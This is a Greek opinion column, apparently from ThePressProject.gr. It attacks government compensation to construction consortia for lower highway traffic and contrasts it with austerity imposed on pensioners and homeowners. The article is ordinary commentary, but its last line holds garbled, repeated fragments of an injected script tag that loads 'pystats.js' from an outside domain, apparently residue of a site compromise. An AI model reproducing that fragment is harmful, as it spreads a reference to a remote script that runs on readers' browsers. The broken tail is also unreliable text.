Ιδιώτες επενδυτές με το πορτοφόλι του Δημοσίου… Κώστας Εφήμερος

Διαβάζω στην Ελευθεροτυπία ότι η κυβέρνηση ετοιμάζει να περάσει νομοσχέδιο με το οποίο θα δοθούν ως αποζημίωση άλλα 350 εκατομμύρια στην κοινοπραξία Μπόμπολα – Ιωάννου – Παρασκευαΐδη – Κόκαλη για τον οδικό άξονα Πελοποννήσου εξαιτίας της μειωμένης κίνησης στους αυτοκινητόδρομους.
Ανάλογες προβλέψεις υπάρχουν και στις συμβάσεις που έχουν υπογράψει οι ίδιοι εργολάβοι για την κατασκευή των εργοστασίων επεξεργασίας απορριμμάτων. Το κράτος εγγυάται δηλαδή ότι αν ο εργολάβος πέσει έξω στους υπολογισμούς του θα τον αποζημιώσει για τον κόπο του.

Ωστόσο τα έργα αυτά γίνονται με τα χρήματα του κράτους μέσω των ταμείων ΕΣΠΑ και τις περιβόητες Συμπράξεις Δημοσίου Ιδιωτικού Τομέα. Ακόμα όμως και στην περίπτωση που δεν υπάρχουν υπερτιμολογήσεις το τμήμα του έργου που πρέπει να χρηματοδοτηθεί από τον ιδιώτη επενδυτή καλύπτεται συνήθως από ένα τραπεζικό δάνειο. Και οι Τράπεζες φυσικά δίνουν αυτά τα δάνεια αφού οι συμβάσεις παραχώρησης εκμετάλλευσης περιλαμβάνουν δικλίδες σαν αυτή που αποκαλύπτει η Ελευθεροτυπία.

Έτσι την ίδια ώρα που το κράτος υπογράφει με την Τρόικα ρήτρες σύμφωνα με τις οποίες οι συντάξεις θα δίνονται στους δικαιούχους μόνο αν τα ταμεία έχουν τα χρήματα, από την άλλη φροντίζει για τα συμφέροντα των εργολάβων εγγυόμενο τα κέρδη τους.

Στην χώρα των μνημονιακών ΜΜΕ η κεντρική προπαγάνδα λέει ότι το δημόσιο προκάλεσε την δημοσιονομική κατάρρευση. Φαίνεται λες και υπάρχει μια γενική παραδοχή ότι οι ρουσφετολογικές προσλήψεις επί δεκαετίες προσέθεσαν ένα αβάσταχτο βάρος στα ελλείματα του κράτους και σαν ωρολογιακή βόμβα κάποια στιγμή που ξεπεράστηκε το σημείο αντοχής έγινε η έκρηξη που έφερε την σημερινή εικόνα της ανθρωπιστικής κρίσης στην Ελλάδα.

Επειδή όμως είμαι λαϊκιστής θέλω να κάνω μια σύγκριση: Ο Χρυσοχοΐδης ανακοίνωσε ότι θα δοθούν 2,2 δις ευρώ για πρόσθετες εργολαβικές αποζημιώσεις προκειμένου να επανεκκινήσουν τα έργα στους μεγάλους αυτοκινητόδρομους ή αν το θέλετε σε μισθούς δημοσίου (με βάση το μέσο όρο μισθοδοσίας σύμφωνα με τα στοιχεία της ΕΛΣΤΑΤ), το κράτος θα δώσει στους εργολάβους όσα θα χρειαζόταν για να πληρώσει τον ετήσιο μισθό σε 210.000 δημοσίους υπαλλήλους μόνο και μόνο επειδή έπεσε η κίνηση στους δρόμους.

 

Κι αν το θέλετε διαφορετικά, τα έσοδα που υπολογίζει το κράτος από την είσπραξη του ΕΝΦΙΑ είναι λίγο περισσότερα από τα χρήματα με τα οποία θα αποζημιώσει φέτος τους ολιγάρχες που έπεσαν έξω στον προγραμματισμό τους. Την ίδια ώρα η κυβέρνηση ετοιμάζεται να άρει την προστασία της πρώτης κατοικίας στο τέλος του 2014 και ο Μάκης Βορίδης ισχυρίζεται ότι κάποια στιγμή θα πρέπει να αναλάβουν τις ευθύνες τους αυτοί που δανείστηκαν περισσότερα από όσα μπορούσαν να ξεπληρώσουν.

Αυτή την είδηση δεν θα την δείτε στο κεντρικό δελτίο του MEGA. Εκεί θα παρακολουθήσετε μόνο τους αναλυτές που θα συνεχίσουν να σας πείθουν ότι το δημόσιο αποτελείται από ρεμπεσκέδες που εξαιτίας τους βρίσκεστε στην κατάσταση που είσαστε σήμερα.

ThePressProject.gr challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >